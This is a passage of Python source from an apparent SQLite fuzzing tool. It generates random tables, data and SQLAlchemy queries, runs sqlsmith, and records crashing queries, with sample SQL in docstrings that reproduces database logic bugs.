randoms.prob(conf.PROB_TABLE[\"PROB_SHARED_DATA\"]) \\\n and len(self.tables[x - 1].row_data) >\\\n prev_primary_idx - 2:\n row_data.append(gendata)\n\n else:\n if y - 1 < self.tables[x - 1].num_tuples and \\\n prev_primary_idx < self.tables[x - 1].\\\n num_tuples:\n prev_pk_idx = self.tables[x - 1].pk_idx\n row_data.append(self.tables[\n x - 1].row_data[prev_primary_idx][prev_pk_idx])\n prev_primary_idx = prev_primary_idx + 1\n\n else:\n row_data.append(gendata)\n\n for z in range(len(row_data)):\n column_name = self.tables[x].columns[z][0]\n # {column_name:row_data}\n insert_dict[column_name] = row_data[z]\n\n # update data to tables (sqlalchemy) and table statistics\n self.tables[x].row_data.append(row_data)\n self.tables_stat[x].add_data(row_data)\n\n # insert rowdata to statistics, then it will convert\n # column-wise\n\n # SQLalchemy query to string\n query = current_alc_table.insert().values(insert_dict)\n conn_sqlite = self.sqlite_engine.connect()\n # conn_postgres = self.postgres_engine.connect()\n # conn_mysql = self.mysql_engine.connect()\n\n conn_sqlite.execute(query)\n query.bind = self.sqlite_engine\n\n self.create_insert += literalquery(query) + \";\\n\\n\"\n # self.create_insert += str(in_data).strip() + \";\\n\\n\"\n\n self.tables[x].num_tuples = num_of_tuples\n\n # update stat explicitly\n self.tables_stat[x].calculate_stat()\n\n def ret_fk(self, num_column, pk_column):\n\n count = 0\n while True:\n count += 1\n assert count < 100\n\n temp_idx = randoms.random_int_range(num_column) - 1\n if temp_idx != pk_column:\n return temp_idx\n\n def ret_rand_type(self):\n \"\"\" return type for column generation\"\"\"\n return COLUMN_TYPES[randoms.random_int_range(NUM_COLUMN_TYPES) - 1]\n\n def ret_columns(self, table_spec, cur_idx):\n \"\"\" return columns (name, type, option)\n - name\n - type: int, string, ...\n - option: foreign / primary key\n \"\"\"\n\n num_column, _, fk_column = table_spec[cur_idx]\n # print (num_column, pk_column, fk_column)\n\n column_spec = [] # return data: [('name', 'type, 'option'), ...]\n\n for x in range(num_column):\n column_name = \"%s\" % (randoms.random_strings(6))\n if x != fk_column:\n column_type = self.ret_rand_type()\n else:\n # foreign key column\n column_type = None\n\n column_spec.append((column_name, column_type))\n\n return column_spec\n\n def run_sqlite_query(self, query):\n with open(self.TMP_QUERY_PN, 'w') as f:\n f.write(query)\n\n cmd = \"sqlite3 %s < %s\" % (DB_FILE, self.TMP_QUERY_PN)\n output = subprocess.getoutput(cmd)\n\n return output\n\n def _gen_sqlsmith_queries(self, query_num, timeout):\n \"\"\" generate sqlsmith queries on postgres DB using OLDEST version \"\"\"\n\n dsn = \"file:%s?mode=ro\" % DB_FILE\n\n cmd = \"timeout %ds ./sqlsmith --verbose --exclude-catalog \\\n --dump-all-queries \\\n --seed=%d --max-queries=%d --sqlite=\\\"%s\\\" \\\n 1> %s 2> %s\" % \\\n (timeout, randoms.random_int_range(1000000), query_num, dsn,\n self.TMP_QUERY_PN, self.TMP_ERR_PN)\n\n subprocess.getoutput(cmd)\n\n def extract_valid_query(self):\n query_result = []\n extract_queries = []\n\n with open(self.TMP_ERR_PN, 'r') as f:\n data = f.read()\n results = \"\"\n if \"Generating\" in data and \"quer\" in data:\n results = data.split(\"Generating indexes...done.\")[1].split(\n \"queries:\")[0]\n results = results.replace(\"\\n\", \"\").strip()\n\n for x in range(len(results)):\n if results[x] == \"e\":\n query_result.append(\"fail\")\n elif results[x] == \".\":\n query_result.append(\"success\")\n elif results[x] == \"S\":\n query_result.append(\"syntax error\")\n elif results[x] == \"C\":\n query_result.append(\"crash server!!!\")\n os.system(\"cat %s >> %s/crashed\" % self.TMP_QUERY_PN,\n FUZZ_MAIN)\n elif results[x] == \"t\":\n query_result.append(\"timeout\")\n else:\n raise Exception('Not possible!')\n\n with open(self.TMP_QUERY_PN, 'r') as f:\n data = f.read()\n results = data.split(\";\")[:-1]\n\n for x in range(len(results)):\n try:\n if query_result[x] == \"success\":\n extract_queries.append(results[x] + \";\")\n\n except Exception:\n pass\n\n return extract_queries\n\n def gen_sqlsmith_queries(self):\n self._gen_sqlsmith_queries(150, 10) # generate query and store text\n queries = self.extract_valid_query()\n\n for query in queries:\n print(self.run_sqlite_query(query))\n\n def DBMS_specific_keyword_addition(self):\n \"\"\" insert DBMS specific keyword which should not affect to result\n e.g, venign pragma, vacuum\n \"\"\"\n \"\"\"\n PRAGMA reverse_unordered_selects=true;\n PRAGMA journal_mode=OFF;\n PRAGMA main.cache_size=0;\n \"\"\"\n pass\n\n def drop_tables(self):\n \"\"\" randomly drop some table \"\"\"\n pass\n\n def create_index(self):\n \"\"\"\n e.g.,\n CREATE INDEX index_0 ON test(c1 COLLATE NOCASE);\n CREATE INDEX index_0 ON test(c0 LIKE '');\n CREATE UNIQUE INDEX index_1 ON test(c0 GLOB c1);\n\n CREATE UNIQUE INDEX IF NOT EXISTS index_0 ON test(c1 == FALSE);\n CREATE INDEX IF NOT EXISTS index_1 ON test(c0 || FALSE) WHERE c1;\n PRAGMA legacy_file_format=true;\n REINDEX; -- Error: UNIQUE constraint failed: index 'index_0'\n\n # create non existing index\n CREATE TABLE t0(c1, c2);\n INSERT INTO t0(c1, c2) VALUES ('a', 1);\n CREATE INDEX i0 ON t0(\"C3\");\n ALTER TABLE t0 RENAME COLUMN c1 TO c3;\n SELECT DISTINCT * FROM t0; -- fetches C3|1 rather than a|1\n \"\"\"\n\n # should store the result to self.create_insert\n\n pass\n\n def select_with_typecast(self):\n \"\"\"\n INSERT INTO t0(c0) VALUES (1);\n PRAGMA reverse_unordered_selects=true;\n SELECT * FROM t0 WHERE ((t0.c0 > 'a') OR (t0.c0 <= 'a'));\n -- fetches no row\n \"\"\"\n pass\n\n def get_rand_data(self, typename):\n if typename == 'String':\n gendata = randoms.ret_randomdata_by_type(typename,\n constraint=MAX_STRING)\n\n if typename == 'Integer':\n gendata = randoms.ret_randomdata_by_type(\n typename,\n min=BOUNDARY[\"Integer\"][0],\n max=BOUNDARY[\"Integer\"][1])\n\n elif typename == 'DateTime':\n gendata = randoms.ret_randomdata_by_type(typename,\n min=DATE_START,\n max=DATE_END)\n\n elif typename == 'Float':\n gendata = randoms.ret_randomdata_by_type(typename,\n min=BOUNDARY[\"Float\"][0],\n max=BOUNDARY[\"Float\"][1])\n\n return gendata\n\n @staticmethod\n def remove_idx_by_name(sqlalchemy_tbl, idx_name, engine):\n \"\"\"\n remove index from the target table using index_name (String)\n \"\"\"\n\n idx_list = list(sqlalchemy_tbl.indexes)\n\n out = []\n for idx in idx_list:\n if idx.name != idx_name:\n out.append(idx)\n else:\n idx.drop(engine)\n\n # TODO: we are not sure about the safety here\n sqlalchemy_tbl.indexes = set(out)\n\n @staticmethod\n def ret_column_by_name(sqlalchemy_tbl, name):\n for col in sqlalchemy_tbl._columns:\n # print(col.name)\n if col.name == name:\n return col\n assert \"Column not exist in the table\"\n\n @staticmethod\n def choose_columns_sqlalchemy(table, column_names, option):\n # table: sqlalchemy object\n # column_names: string\n\n if option == \"one\":\n num_cols = 1\n chosen_columns = random.choices(\n column_names, k=randoms.random_int_range(num_cols))\n\n elif option == \"all\":\n chosen_columns = column_names\n\n elif option == \"wo_idx\":\n # TODO: fix here (like with_idx)\n defined_indexes = set(map(lambda x: x.name, list(table.indexes)))\n chosen_columns = list(set(column_names) - defined_indexes)\n\n elif option == \"with_idx\":\n # print(str(list(list(table.indexes)[0].columns)[0]).split(\".\")[1])\n chosen_columns = list(\n map(lambda x: str(list(x.columns)[0]).split(\".\")[1],\n list(table.indexes)))\n\n else:\n num_cols = len(column_names)\n chosen_columns = random.choices(\n column_names, k=randoms.random_int_range(num_cols))\n\n out = []\n for item in chosen_columns:\n # print(table.c)\n # print(item)\n selected_col = getattr(table.c, item)\n out.append(selected_col)\n\n return out\n\n def choose_columns_sqlalchemy_type(self, tbl, _type):\n # tableinfo: should know the name of each column\n\n tbl_idx = self.alc_tables.index(tbl)\n tbl_names = self.tables_stat[tbl_idx].column_name\n tbl_types = self.tables_stat[tbl_idx].column_type\n\n sametype_cols = []\n for x in range(len(tbl_types)):\n if tbl_types[x] == _type:\n sametype_cols.append(tbl_names[x])\n\n chosen_col_name = random.choice(sametype_cols)\n selected_col = getattr(tbl.c, chosen_col_name)\n\n return selected_col\n\n def choose_columns(self, table, mutable=False):\n \"\"\"\n return randomly chosen column index of table\n - mutable:False ==> disregard pk/fk columns\n - mutable:True ==> consider all columns\n \"\"\"\n return_candidate = list(range(len(table.columns)))\n\n pk_idx = table.pk_idx\n fk_idx = table.fk_idx\n\n if mutable is True:\n return_candidate.remove(pk_idx)\n if fk_idx in return_candidate:\n return_candidate.remove(fk_idx)\n\n random.shuffle(return_candidate)\n # print (\"before ret\", return_candidate)\n\n if len(return_candidate) < 1:\n return []\n # This condition is for where\n # TODO: use more than two where conditions\n elif mutable is False:\n return [return_candidate[0]]\n else:\n return_num = randoms.random_int_range(len(return_candidate)) - 1\n return_list = return_candidate[0:return_num]\n\n return return_list\n\n def ret_set_str(self, set_dict):\n\n set_list = []\n\n for column_name in set_dict.keys():\n newdata, typename = set_dict[column_name]\n # print(newdata, typename)\n if typename in NUMERIC:\n set_list.append(\"\\\"%s\\\" = %s\" % (column_name, newdata))\n else:\n set_list.append(\"\\\"%s\\\" = \\\"%s\\\"\" % (column_name, newdata))\n\n return ',\\n'.join(map(str, set_list))\n\n def ret_typename_from_class(self, typeclass):\n if \"VARCHAR\" in str(typeclass):\n typename = \"String\"\n else:\n typename = typeclass.__name__\n return typename\n\n @staticmethod\n def ret_limit_num(tblstat):\n # return limit, offset from the given TableStat class\n offset = randoms.random_int_range(tblstat.table_size - 1)\n limit = randoms.random_int_range(tblstat.table_size - offset)\n return limit, offset\n\n def select_tuples(self,\n template_seed=0,\n idx=None,\n cur_sqlalchemy_table=None,\n column_names=None):\n \"\"\"\n * should maintain statistics when insert\n \"\"\"\n CONJ = [\"and\", \"or\"]\n # sharing code for all templates:\n if (idx is None and cur_sqlalchemy_table is None\n and column_names is None):\n idx = random.choice(range(len(self.sqlalchemy_tables)))\n cur_sqlalchemy_table = self.sqlalchemy_tables[idx]\n column_names = self.tables_stat[idx].column_name\n ###############################\n # [*] NORMAL SELECT: one table\n ###############################\n if (template_seed == 0):\n print(\"*normal select one table\")\n\n select_columns = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"random\")\n\n stmt = select(select_columns)\n print(literalquery(stmt) + \";\", file=sys.stderr)\n return stmt\n ###############################\n # [*] NORMAL SELECT: limit and offset\n ###############################\n elif (template_seed == 1):\n print(\"*normal select limit and offset\")\n\n select_columns = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"random\")\n\n limit, offset = CreateSequences.ret_limit_num(\n self.tables_stat[idx])\n stmt = select(select_columns).limit(limit).offset(offset)\n print(literalquery(stmt) + \";\", file=sys.stderr)\n return stmt\n ###############################\n # [*] NORMAL SELECT: group by\n ###############################\n elif (template_seed == 2):\n print(\"*normal select group by\")\n\n select_columns = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"random\")\n group_by_columns = random.choices(select_columns,\n k=randoms.random_int_range(\n len(select_columns)))\n\n stmt = select(select_columns)\n for column in group_by_columns:\n stmt = stmt.group_by(column)\n print(literalquery(stmt) + \";\", file=sys.stderr)\n return stmt\n ###############################\n # [*] NORMAL SELECT: having\n ###############################\n elif (template_seed == 3):\n print(\"*normal select having\")\n\n select_columns = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"random\")\n group_by_columns = random.choices(select_columns,\n k=randoms.random_int_range(\n len(select_columns)))\n\n # group_by first (before having)\n stmt = select(select_columns)\n for column in group_by_columns:\n stmt = stmt.group_by(column)\n\n # then, apply having (similar with where)\n having_col = random.choice(group_by_columns)\n # print(\"?\")\n having_col_stat = self.tables_stat[idx].ret_stat(having_col.name)\n # print(\"?\", having_col_stat)\n\n having_col_data = self.tables_stat[idx].ret_string(having_col.name)\n # print(\"?\", having_col_data)\n\n having_col_cond = where_generator(having_col, None,\n having_col_stat, None,\n having_col_data)\n # print(\"?\")\n\n stmt = stmt.having(having_col_cond)\n print(literalquery(stmt) + \";\", file=sys.stderr)\n return stmt\n ###############################\n # [*] NORMAL SELECT + ONE WHERE CONDITION (e.g., where (A))\n ###############################\n elif (template_seed == 4):\n\n print(\"*NORMAL SELECT + ONE WHERE CONDITION\")\n\n select_columns = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"random\")\n column1 = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"one\")[0]\n tablename1, columnname1 = str(column1).split(\".\")\n column1_stat = self.tables_stat[idx].ret_stat(columnname1)\n column1_data = self.tables_stat[idx].ret_string(columnname1)\n\n column1_where = where_generator(column1, None, column1_stat, None,\n column1_data)\n column2_where = where_generator(column1, None, column1_stat, None,\n column1_data)\n\n stmt_where1 = select(select_columns).where(column1_where)\n # stmt_where2 = select(select_columns).where(column2_where)\n # stmt_union = stmt_where1.union(stmt_where2)\n\n if True:\n print(literalquery(stmt_where1) + \";\", file=sys.stderr)\n # print(literalquery(stmt_where2)+\";\",file=sys.stderr)\n # print(literalquery(stmt_union)+\";\",file=sys.stderr)\n return stmt_where1\n ###############################\n # [*] NORMAL SELECT + TWO WHERE CONDITIONS (e.g., where(A and B))\n ###############################\n elif (template_seed == 5):\n\n print(\"*NORMAL SELECT + two WHERE CONDITION\")\n\n select_columns = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"random\")\n column1 = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"one\")[0]\n tablename1, columnname1 = str(column1).split(\".\")\n column1_stat = self.tables_stat[idx].ret_stat(columnname1)\n column1_data = self.tables_stat[idx].ret_string(columnname1)\n\n column1_where = where_generator(column1, None, column1_stat, None,\n column1_data)\n column2 = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"one\")[0]\n tablename2, columnname2 = str(column2).split(\".\")\n column2_stat = self.tables_stat[idx].ret_stat(columnname2)\n column2_data = self.tables_stat[idx].ret_string(columnname2)\n column2_where = where_generator(column2, None, column2_stat, None,\n column2_data)\n\n # combine and / or\n if (column1_where is not None and column2_where is not None):\n combined_where = combine_condition(column1_where,\n column2_where,\n random.choice(CONJ))\n stmt_where2 = select(select_columns).where(combined_where)\n if True:\n print(literalquery(stmt_where2) + \";\", file=sys.stderr)\n return stmt_where2\n ###############################\n # [*] NORMAL SELECT + TWO MORE WHERE NESTED CONDITIONS\n # (e.g., where ((A and B) and C))\n ###############################\n elif (template_seed == 6):\n print(\"*NORMAL SELECT + TWO MORE WHERE NESTED CONDITIONS\")\n\n select_columns = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"random\")\n column1 = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"one\")[0]\n tablename1, columnname1 = str(column1).split(\".\")\n column1_stat = self.tables_stat[idx].ret_stat(columnname1)\n column1_data = self.tables_stat[idx].ret_string(columnname1)\n\n column1_where = where_generator(column1, None, column1_stat, None,\n column1_data)\n column2 = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"one\")[0]\n tablename2, columnname2 = str(column2).split(\".\")\n column2_stat = self.tables_stat[idx].ret_stat(columnname2)\n column2_data = self.tables_stat[idx].ret_string(columnname2)\n column2_where = where_generator(column2, None, column2_stat, None,\n column2_data)\n\n column3 = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"one\")[0]\n tablename3, columnname3 = str(column3).split(\".\")\n column3_stat = self.tables_stat[idx].ret_stat(columnname3)\n column3_data = self.tables_stat[idx].ret_string(columnname3)\n column3_where = where_generator(column3, None, column3_stat, None,\n column3_data)\n if (column1_where is not None and column2_where is not None\n and column3_where is not None):\n\n combined_where1 = combine_condition(column1_where,\n column2_where,\n random.choice(CONJ))\n combined_where2 = combine_parenthesis(combined_where1,\n column3_where,\n random.choice(CONJ))\n stmt_where3 = select(select_columns).where(combined_where2)\n if True:\n print(literalquery(stmt_where3) + \";\", file=sys.stderr)\n return stmt_where3\n\n ###############################\n # [*] NORMAL SELECT + LIMIT + HAVING + GROUPBY\n ###############################\n\n # small_s = select([student.c.studentid, student.c.name,\n # func.avg(marks.c.total_marks-5)]).limit(0)\n\n # s = select([student.c.studentid, student.c.name,\n # func.avg(marks.c.total_marks-5)])\\\n # .where( and_(student.c.studentid == marks.c.studentid, \\\n # marks.c.total_marks >=\\\n # select([marks.c.total_marks]).where(marks.c.studentid == 'V003')))\\\n # .order_by(asc(student.c.studentid))\\\n # .limit(4)\\\n # .offset(0)\\\n # .group_by(student.c.name, student.c.studentid)\\\n # .having(func.avg(marks.c.total_marks) > 80)\\\n # .distinct()\n\n # stmt_limit = select(select_columns).where(combined_where2)\n # if False:\n # print(literalquery(stmt_limit))\n\n ###############################\n # [*] JOIN\n ###############################\n\n # \"\"\"\n # j = join(Student, StudentCourse, Student.c.roll_no\n # == StudentCourse.c.roll_no)\n # s = select([StudentCourse.c.course_id, Student.c.name,\n # Student.c.age]).select_from(j)\n # \"\"\"\n\n elif (template_seed == 7):\n print(\"*JOIN\")\n # idx = random.choice(range(len(self.sqlalchemy_tables)))\n # cur_sqlalchemy_table = self.sqlalchemy_tables[idx]\n\n tbl1, tbl2, tbl1_col, tbl2_col, tbl1_idx = self.choose_join_tables(\n )\n column_names = self.tables_stat[tbl1_idx].column_name\n select_columns = CreateSequences.choose_columns_sqlalchemy(\n tbl1, column_names, option=\"random\")\n\n j = join(tbl1, tbl2, tbl1_col == tbl2_col)\n stmt_join1 = select(select_columns).select_from(j)\n if True:\n print(literalquery(stmt_join1) + \";\", file=sys.stderr)\n return stmt_join1\n ###############################\n # [*] SUBQUERY#1: using two tables\n ###############################\n\n # \"\"\"\n # s = select([student.c.studentid, student.c.name, marks.c.total_marks])\\\n # .where( and_(student.c.studentid == marks.c.studentid, \\\n # marks.c.total_marks > select( [func.avg(marks.c.total_marks)])\\\n # .where(marks.c.total_marks > 80)) )\n # \"\"\"\n elif (template_seed == 8):\n\n print(\" * SUBQUERY#1: using two tables\")\n\n # select target tables for subquery\n tbl1, tbl2, tbl1_col, tbl2_col, tbl1_idx = self.choose_join_tables(\n )\n select_columns = CreateSequences.choose_columns_sqlalchemy(\n tbl1, column_names, option=\"random\")\n tbl1_sametype_col, tbl2_sametype_col, typename = \\\n self.choose_same_type_columns(tbl1, tbl2)\n # we have to use type of each column\n # 1) select two columns with same types\n stmt_sub1 = select(select_columns)\\\n .where(and_(tbl1_col == tbl2_col,\n tbl1_sametype_col > select([tbl2_sametype_col])))\n print(literalquery(stmt_sub1) + \";\", file=sys.stderr)\n return stmt_sub1\n # 2) select two columns regardless of types and CAST\n\n def update_tuples_sqlalchemy(self):\n # update_query = ''\n\n for x in range(len(self.sqlalchemy_tables)):\n cur_table = self.tables[x]\n cur_sqlalchemy_table = self.sqlalchemy_tables[x]\n selected_columns = self.choose_columns(cur_table,\n mutable=True) # array\n set_candidate = {}\n\n for column_idx in selected_columns:\n \"\"\"\n if \"VARCHAR\" in str(self.tables[x].columns[column_idx][1]):\n typename = \"String\"\n else:\n typename = self.tables[x].columns[column_idx][1].__name__\n \"\"\"\n typename = self.ret_typename_from_class(\n str(self.tables[x].columns[column_idx][1]))\n column_name = self.tables[x].columns[column_idx][0]\n\n newdata = self.get_rand_data(typename)\n set_candidate[column_name] = (newdata, typename)\n\n set_str = self.ret_set_str(set_candidate)\n if set_str == \"\":\n continue\n\n # print(set_candidate)\n # where_column_idx = selected_columns[0]\n where_operator = COMPARISONS[randoms.random_int_range(\n len(COMPARISONS) - 1)]\n if typename in NUMERIC:\n where_str = \"\\\"%s\\\" %s %s\" % (column_name, where_operator,\n newdata)\n else:\n where_str = \"\\\"%s\\\" %s \\\"%s\\\"\" % (column_name, where_operator,\n newdata)\n\n # TODO: debugging here\n # print(where_str)\n # print(set_str)\n # print(dir(cur_table))\n stmt = cur_sqlalchemy_table.update().where(where_str).\\\n value(set_str)\n if False:\n print(literalquery(stmt))\n\n def update_tuples(self):\n \"\"\" update template\n UPDATE table\n SET column_1 = new_value_1,\n column_2 = new_value_2\n WHERE\n search_condition\n ORDER column_or_expression\n LIMIT row_count OFFSET offset;\n \"\"\"\n \"\"\"\n - pick 1~2 columns (which is not pk, fk)\n - where uses data generation\n - random operators\n \"\"\"\n \"\"\"\n TODO:\n UPDATE OR REPLACE\n \"\"\"\n\n update_query = ''\n for x in range(len(self.tables)):\n if randoms.prob(conf.PROB_TABLE[\"PROB_UPDATE\"]):\n # print(\"Update %s table\" % self.tables[x].table_name)\n\n # 1) Update table name\n update_query = UPDATE.replace(\"{table}\",\n self.tables[x].table_name)\n selected_columns = self.choose_columns(self.tables[x],\n mutable=True) # array\n\n # 2) Set\n set_candidate = {}\n for column_idx in selected_columns:\n\n if \"VARCHAR\" in str(self.tables[x].columns[column_idx][1]):\n typename = \"String\"\n else:\n typename = self.tables[x].\\\n columns[column_idx][1].__name__\n column_name = self.tables[x].columns[column_idx][0]\n\n newdata = self.get_rand_data(typename)\n set_candidate[column_name] = (newdata, typename)\n\n set_str = self.ret_set_str(set_candidate)\n if set_str == \"\":\n continue\n update_query = update_query.replace(\"{set}\", set_str)\n\n # 3) Where\n # - first, we apply only one where condition\n # TODO: multiple where condition\n # TODO: add constant\n # TODO: add cast\n where_column_idx = selected_columns[0]\n where_operator = COMPARISONS[randoms.random_int_range(\n len(COMPARISONS) - 1)]\n\n if \"VARCHAR\" in \\\n str(self.tables[x].columns[where_column_idx][1]):\n typename = \"String\"\n else:\n typename = self.tables[x].\\\n columns[where_column_idx][1].__name__\n column_name = self.tables[x].columns[where_column_idx][0]\n newdata = self.get_rand_data(typename)\n\n if typename in NUMERIC:\n where_str = \"\\\"%s\\\" %s %s\" % (column_name, where_operator,\n newdata)\n else:\n where_str = \"\\\"%s\\\" %s \\\"%s\\\"\" % (column_name,\n where_operator, newdata)\n update_query = update_query.replace(\"{where}\", where_str)\n # 4) Limit\n if randoms.prob(conf.PROB_TABLE[\"PROB_UPDATE_LIMIT\"]):\n update_query += \"\\nLIMIT %d\" % (\n randoms.random_int_range(3))\n\n update_query += \";\"\n\n else:\n # print(\"Don't update %s table\" % self.tables[x].table_name)\n pass\n\n if \"{set}\" not in update_query:\n self.update = update_query\n\n def delete_tuples(self):\n \"\"\" template\n DELETE FROM table\n WHERE search_condition\n ORDER BY criteria,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n LIMIT row_count OFFSET offset;\n \"\"\"\n\n delete_query = ''\n\n for x in range(len(self.tables)):\n if randoms.prob(conf.PROB_TABLE[\"PROB_DELETE\"]):\n\n # 1) Delete table name\n delete_query = DELETE.replace(\"{table}\",\n self.tables[x].table_name)\n # table_name = self.tables[x].table_name\n selected_columns = self.choose_columns(self.tables[x],\n mutable=True) # array\n\n if len(selected_columns) == 0:\n continue\n\n # 2) Where\n where_column_idx = selected_columns[0]\n where_operator = COMPARISONS[randoms.random_int_range(\n len(COMPARISONS) - 1)]\n\n # data = self.tables[x].row_data[0][where_column_idx]\n\n if \"VARCHAR\" in \\\n str(self.tables[x].columns[where_column_idx][1]):\n typename = \"String\"\n else:\n typename = self.tables[x].\\\n columns[where_column_idx][1].__name__\n column_name = self.tables[x].columns[where_column_idx][0]\n newdata = self.get_rand_data(typename)\n\n if typename in NUMERIC:\n where_str = \"\\\"%s\\\" %s %s\" % (column_name, where_operator,\n newdata)\n else:\n where_str = \"\\\"%s\\\" %s \\\"%s\\\"\" % (column_name,\n where_operator, newdata)\n delete_query = delete_query.replace(\"{where}\", where_str)\n\n # 3) Limit\n if randoms.prob(conf.PROB_TABLE[\"PROB_UPDATE_LIMIT\"]):\n delete_query += \"\\nLIMIT %d\" % (\n randoms.random_int_range(3))\n delete_query += \";\"\n\n if \"{where}\" not in delete_query:\n self.delete = delete_query\n\n def mutation(self, component):\n if component == \"select\":\n sm = SelectMutation(self.tables_stat, self.tables,\n self.sqlalchemy_tables)\n sm.select_mutation()\n\n elif component == \"index\":\n im = IndexMutation(self.tables_stat, self.tables,\n self.sqlalchemy_tables, self.sqlite_engine)\n im.index_mutation()\n\n elif component == \"where\":\n wm = WhereMutation(self.tables_stat, self.tables,\n self.sqlalchemy_tables, self.sqlite_engine)\n wm.where_mutation()\n\n\ndef stmt_complex(stmt, available_columns):\n # given a statement, randomly add stuff in the tail\n # available_columns: column object from the sa_table\n # group\n # print(\"ac\", available_columns)\n print(\"examine project columns\", type(stmt.c))\n if (random_int_range(1000) < conf.PROB_TABLE[\"group\"]):\n chosen_groupby_columns = random.choices(\n available_columns,\n k=randoms.random_int_range(len(available_columns)))\n for column in chosen_groupby_columns:\n stmt = stmt.group_by(column)\n # distinct entire select\n if (random_int_range(1000) < conf.PROB_TABLE[\"distinct\"]):\n stmt = stmt.distinct()\n # order\n if (random_int_range(1000) < conf.PROB_TABLE[\"order\"]):\n chosen_orderby_columns = random.choices(available_columns, k=1)\n for column in chosen_orderby_columns:\n if (ret_typename_from_class(column.type) in [\"Float\", \"Integer\"]):\n stmt = stmt.order_by(asc(column))\n # limit\n if (random_int_range(1000) < conf.PROB_TABLE[\"limit\"]):\n stmt = stmt.limit(random_int_range_contain_zero(20))\n\n if (random_int_range(1000) < conf.PROB_TABLE[\"offset\"]):\n stmt = stmt.offset(random_int_range_contain_zero(20))\n return stmt\n\n\ndef rule_expandaggregatedistinct(spec, query_count):\n # this generation mechanism have already been integrated into the generator.\n select_number_of_columns = 2\n select_columns, where_clause, table_idx, selectable_columns = spec.gen_select_statement(\n select_number_of_columns)\n stmt = select(select_columns).where(where_clause)\n print(literalquery(stmt) + \";\", file=sys.stderr)\n query_count += 1\n return query_count\n\n\ndef rule_aggregatecaserule(spec, query_count):\n # this generation mechanism have already been integrated into the generator.\n print(\"begin fire aggregate case rule\")\n select_number_of_columns = 2\n select_columns, where_clause, table_idx, selectable_columns = spec.gen_select_statement(\n select_number_of_columns)\n stmt = select(select_columns).where(where_clause)\n print(literalquery(stmt) + \";\", file=sys.stderr)\n query_count += 1\n return query_count\n\n\ndef rule_aggregatevaluesrule(spec, query_count):\n # this generation mechanism have already been integrated into the generator.\n print(\"begin fire aggregate values rule\")\n select_number_of_columns = 3\n select_columns, where_clause, table_idx, selectable_columns = spec.gen_select_statement(\n select_number_of_columns)\n stmt = select(select_columns).where(where_clause)\n print(literalquery(stmt) + \";\", file=sys.stderr)\n query_count += 1\n return query_count\n\n\ndef reproduce_bug1(spec, query_count):\n print(\"begin reproduce bug about reoptimize expression tree\")\n # select_number_of_columns = random_int_range(3)\n select_columns, where_clause, table_idx, selectable_columns = spec.gen_select_statement(\n )\n stmt = select(select_columns).where(where_clause)\n selectable_columns = []\n sqlalchemy_tables = spec.scope.alc_tables\n table_a = spec.scope.alc_tables[table_idx]\n for item in table_a._columns:\n selectable_columns.append(item)\n stmt = stmt_complex(stmt, selectable_columns)\n print(literalquery(stmt) + \";\", file=sys.stderr)\n query_count += 1\n # stmt = select(select_columns)\n # print(type(select_columns[0].type))\n if (ret_typename_from_class(select_columns[0].type) == \"String\"):\n select_columns_, where_clause_, table_idx_, _ = spec.gen_select_statement(\n 1)\n enclosing_stmt = select(select_columns_).where(\n not_(stmt.as_scalar().is_distinct_from(conf.SCALAR_STR)))\n query_count += 1\n print(literalquery(enclosing_stmt) + \";\", file=sys.stderr)\n\n return query_count\n\ndef top_generation(spec, query_count):\n # select_columns, where_clause, table_idx, selectable_columns = spec.gen_select_statement(\n # )\n # if(spec.joined is True):\n # spec.getjoined()\n # stmt = select(select_columns).select_from.where(where_clause)\n # stmt = stmt_complex(stmt)\n\n # else:\n # stmt = select(select_columns).where(where_clause)\n # if conf.PROB_TABLE[\"scalar\"]:\n # # choose from an existing stmt\n # if conf.PROB_TABLE[\"set\"]:\n # # get a previous subquery that has the same number of\n # # for loop call\n # return\n # print(final_stmt)\n return\ndef set_query_generation(spec, stmt, select_expr):\n temp_query = stmt\n success_flag = False\n for i in range(3):\n # try to create a super query that involve 10 set operations\n print(\"len\", len(select_expr))\n try:\n select_columns, where_clause, table_idx, selectable_columns, joined_from, base_table = spec.gen_select_statement(select_column_number=len(select_expr), force_simple_from = True)\n except Exception as inst:\n # this might cause exception because joined_from does not have that many selectable columns\n print(\"exception in using set operations\", inst)\n traceback.print_exc(file=sys.stdout)\n continue\n if (base_table is False):\n # we only use select from base table to construct set queries\n continue\n print(\"find set compatible column\")\n # for j in range(len(select_columns_)):\n # c=select_columns_[j].label(\"subc\" + str(j))\n # select_columns_[j] = c\n # rearrange the column to match type\n reordered_select_columns_ = []\n for c_ in select_expr:\n for c in select_columns:\n if ret_typename_from_class(c.type) == ret_typename_from_class(\n c_.type):\n reordered_select_columns_.append(c)\n break\n reordered_select_columns_ = list(\n dict.fromkeys(reordered_select_columns_))\n\n if (len(reordered_select_columns_)) != len(select_columns):\n print(\"two query not set compatible\")\n continue\n stmt_ = select(reordered_select_columns_).where(where_clause)\n stmt_ = stmt_complex(stmt_, reordered_select_columns_)\n another_query = stmt_\n try:\n query_union = run_set_operation(temp_query,\n another_query).alias(name=\"dt\")\n selectable_columns = get_selectable_column(query_union)\n outside_where = spec.gen_where_clause(None, None, selectable_columns)\n print(\"set where\", outside_where)\n temp_query = select(random.sample(selectable_columns, random.randint(1, len(selectable_columns)))).select_from(query_union).where(outside_where)\n temp_query = stmt_complex(temp_query, selectable_columns)\n\n success_flag = True\n except Exception as 